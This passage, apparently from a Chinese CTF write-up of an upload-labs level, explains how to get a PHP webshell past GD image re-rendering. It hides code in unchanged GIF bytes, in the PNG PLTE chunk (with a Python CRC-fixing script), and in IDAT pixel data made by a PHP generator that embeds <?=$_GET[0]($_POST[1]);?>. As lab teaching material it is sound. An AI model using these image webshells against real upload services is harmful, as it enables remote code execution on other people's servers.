//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
这一关将图片重新渲染了,主要作用是破坏掉其中的恶意代码。
使用 imagecreatefromjpeg/imagecreatefrompng/imagecreatefromgif 函数对图片进行二次渲染,属于 GD 图像库。
我们可以考虑先上传一张正常的图片,寻找渲染后的图片与原始图片对比不变的数据块,将木马插入到这些部分中。
gif:
查看上传的图片,与原始图片进行比较。
找出其中地址和大小都尽量匹配的数据块,如图所示:
在这些没有改变的地方插入木马:
成功上传并 get shell。
jpg:
阅读其他文章 可知,jpg 图片易损,经过二次渲染后不变的数据块很少。难以制作图片木马。
png:
首先分析 PNG 图片结构。
文件头
PNG 文件标志,固定为 89 50 4E 47 0D 0A 1A 0A。
数据块
PNG 定义了两种类型的数据块。一种称为关键数据块,每个 PNG 文件都必须包含它们;另一种叫做辅助数据块,这是可选的数据块。
- 关键数据块(critical chunk)
- IHDR(文件头数据块):包含图像基本信息,作为第一个数据块出现并只出现一次。
- PLTE(调色板数据块):可选,定义索引颜色图像中的颜色,存放在图像数据块(IDAT)之前。
- IDAT(图像数据块):存储实际的图像数据,PNG 数据包允许包含多个连续的图像数据块。
- IEND(图像结束数据):标识图像数据结束。标识 PNG 文件结束,无数据字段,CRC 固定为
AE 42 60 82。
- 辅助数据块(ancillary chunks)
| 数据块符号 | 数据块名称 | 多数据块 | 可选否 | 位置限制 |
|---|---|---|---|---|
| cHRM | 基色和白色点数据块 | 否 | 是 | 在 PLTE 和 IDAT 之前 |
| gAMA | 图像γ数据块 | 否 | 是 | 在 PLTE 和 IDAT 之前 |
| sBIT | 样本有效位数据块 | 否 | 是 | 在 PLTE 和 IDAT 之前 |
| bKGD | 背景颜色数据块 | 否 | 是 | 在 PLTE 之后 IDAT 之前 |
| hIST | 图像直方图数据块 | 否 | 是 | 在 PLTE 之后 IDAT 之前 |
| tRNS | 图像透明数据块 | 否 | 是 | 在 PLTE 之后 IDAT 之前 |
| oFFs | (专用公共数据块) | 否 | 是 | 在 IDAT 之前 |
| pHYs | 物理像素尺寸数据块 | 否 | 是 | 在 IDAT 之前 |
| sCAL | (专用公共数据块) | 否 | 是 | 在 IDAT 之前 |
| tIME | 图像最后修改时间数据块 | 否 | 是 | 无限制 |
| tEXt | 文本信息数据块 | 是 | 是 | 无限制 |
| zTXt | 压缩文本数据块 | 是 | 是 | 无限制 |
| iTXt | 国际文本数据块 | 是 | 是 | 无限制 |
| fRAc | (专用公共数据块) | 是 | 是 | 无限制 |
| gIFg | (专用公共数据块) | 是 | 是 | 无限制 |
| gIFt | (专用公共数据块) | 是 | 是 | 无限制 |
| gIFx | (专用公共数据块) | 是 | 是 | 无限制 |
数据块结构
每个数据块包含以下字段:
| 名称 | 字节数 | 说明 |
|---|---|---|
| Length(长度) | 4 字节 | 指定数据块中数据域的长度,其长度不超过(231-1)字节 |
| Chunk Type Code(数据块类型码) | 4 字节 | 数据块类型码由 ASCII 字母(A - Z 和 a - z)组成 |
| Chunk Data(数据块数据) | 可变长度 | 存储按照 Chunk Type Code 指定的数据 |
| CRC(循环冗余检测) | 4 字节 | 存储用来检测是否有错误的循环冗余码 |
CRC(Cyclic Redundancy Check)域中的值是对 Chunk Type Code 域和 Chunk Data 域中的数据进行计算得到的。
示例结构:
- 文件头 (8 字节)
- IHDR 块 (25 字节)
- PLTE 块 (可选)
- IDAT 块 (一个或多个)
- IEND 块 (12 字节)
分析数据块
IHDR
文件头数据块 IHDR(Header Chunk):它包含有 PNG 文件中存储的图像数据的基本信息,由 13 字节组成,并要作为第一个数据块出现在 PNG 数据流中,而且一个 PNG 数据流中只能有一个文件头数据块。
我们一般关注前 8 字节的内容:
| 域的名称 | 字节数 | 说明 |
|---|---|---|
| Width | 4 bytes | 图像宽度,以像素为单位 |
| Height | 4 bytes | 图像高度,以像素为单位 |
我们经常会去更改一张图片的高度或者宽度使得一张图片显示不完整从而达到隐藏信息的目的。
PLTE
调色板数据块 PLTE:它包含有与索引彩色图像(indexed-color image)相关的彩色变换数据,它仅与索引彩色图像有关,而且要放在图像数据块(image data chunk)之前。真彩色的 PNG 数据流也可以有调色板数据块,目的是便于非真彩色显示程序用它来量化图像数据,从而显示该图像。
PLTE 可以包含 $1\sim 256$ 个调色板信息,每一个调色板信息由 3 个字节组成:
| 颜色 | 字节 | 意义 |
|---|---|---|
| Red | 1 byte | 0 = 黑色, 255 = 红 |
| Green | 1 byte | 0 = 黑色, 255 = 绿色 |
| Blue | 1 byte | 0 = 黑色, 255 = 蓝色 |
因此,调色板的长度应该是3的倍数。
对于索引图像,调色板信息是必须的,调色板的颜色索引从 0 开始编号,然后是 1,2…,调色板的颜色数不能超过色深中规定的颜色数(如图像色深为 4 的时候,调色板中的颜色数不可以超过 2^4=16)。否则,这将导致 PNG 图像不合法。
PLTE 数据块结构:
| 名称 | 字节数 | 说明 |
|---|---|---|
| Length | 4 字节 | 指定数据块中数据域的长度,其长度不超过(231-1)字节 |
| Chunk Type Code | 4 字节 | 标识块类型,固定为 PLTE |
| Chunk Data | 可变长度 | 存储调色板数据,每个颜色由 3 字节(RGB)表示 |
| CRC | 4 字节 | 校验值,用于验证数据块的完整性 |
IDAT
图像数据块 IDAT(image data chunk):它存储实际的数据,在数据流中可包含多个连续顺序的图像数据块。
IDAT 数据块结构:
| 名称 | 字节数 | 说明 |
|---|---|---|
| Length | 4 字节 | 指定 Chunk Data 字段的长度 |
| Chunk Type Code | 4 字节 | 标识块类型,固定为 IDAT |
| Chunk Data | 可变长度 | 存储 zlib 压缩后的图像数据,包括: 1.zlib 压缩头(1 字节) 2.压缩后的图像数据 3.zlib 校验值(4 字节) |
| CRC | 4 字节 | 校验值,用于验证数据块的完整性 |
IEND
图像结束数据 IEND(image trailer chunk):它用来标记 PNG 文件或者数据流已经结束,并且必须要放在文件的尾部。
1
00 00 00 00 49 45 4E 44 AE 42 60 82
IEND 数据块的长度总是 00 00 00 00,数据标识总是 IEND 49 45 4E 44,因此,CRC 码也总是 AE 42 60 82。
在 PNG 图片中写入 php 代码的方式
- 写入 PLTE 数据块
php 底层在对 PLTE 数据块验证的时候,主要进行了 CRC 校验。所以可以在 chunk data 域插入 php 代码,然后重新计算相应的 CRC 值并修改即可。
这种方式只针对索引彩色图像的 png 图片才有效,在选取 png 图片时可根据 IHDR 数据块的 color type 辨别 03 为索引彩色图像。
例如:
我们在 PLTE 数据块中写入 php 代码:
然后重新计算 CRC 的值:CRC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import binascii
import re
from pathlib import Path
png_path = Path(__file__).resolve().parent / "03png.png"
a = png_path.read_bytes()
hexstr = a.hex() # 转十六进制字符串
''' PLTE crc '''
# "504c5445" 是 "PLTE" 的十六进制形式
# "49444154" 是 "IDAT" 的十六进制形式
# "74524e53" 是 "tRNS" 的十六进制形式
# 如果后面有 tRNS 数据块就从 tRNS 的标识符截断
# data = '504c5445'+ re.findall('504c5445(.*?)74524e53',hexstr)[0] # 取出从 PLTE 类型码开始到下一个 tRNS 类型码之前的数据
data = '504c5445'+ re.findall('504c5445(.*?)49444154',hexstr)[0] # 取出从 PLTE 类型码开始到下一个 IDAT 类型码之前的数据
# data[:-16] 截掉最后 8 字节。分别是旧 CRC(4 字节)和下一个 IDAT 块的 length(4 字节)
crc = binascii.crc32(binascii.unhexlify(data[:-16])) & 0xffffffff # 计算 CRC 值并保证返回的是无符号 32 位结果
print(hex(crc))
可以得到 PLTE 数据块的 CRC 值,例如:d184739b。
然后修改 CRC 值,这里可以先搜索 tRNS,PLTE 数据块的 CRC 值就在 tRNS 的前面。
如图,这里就是 CRC 校验码:
修改后:
保存上传,下载发现木马经过重新渲染后依然存在。
成功 getshell。
- 写入 IDAT 数据块
用 php 生成一个图片马。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');
?>
其中包含木马 <?=$_GET[0]($_POST[1]);?>。
参考文章
- https://sxksec.cn/2025/01/02/ctf-shi-zhan/web-buuoj-upload-labs-linux-wen-jian-shang-chuan/
- https://ctf-wiki.org/























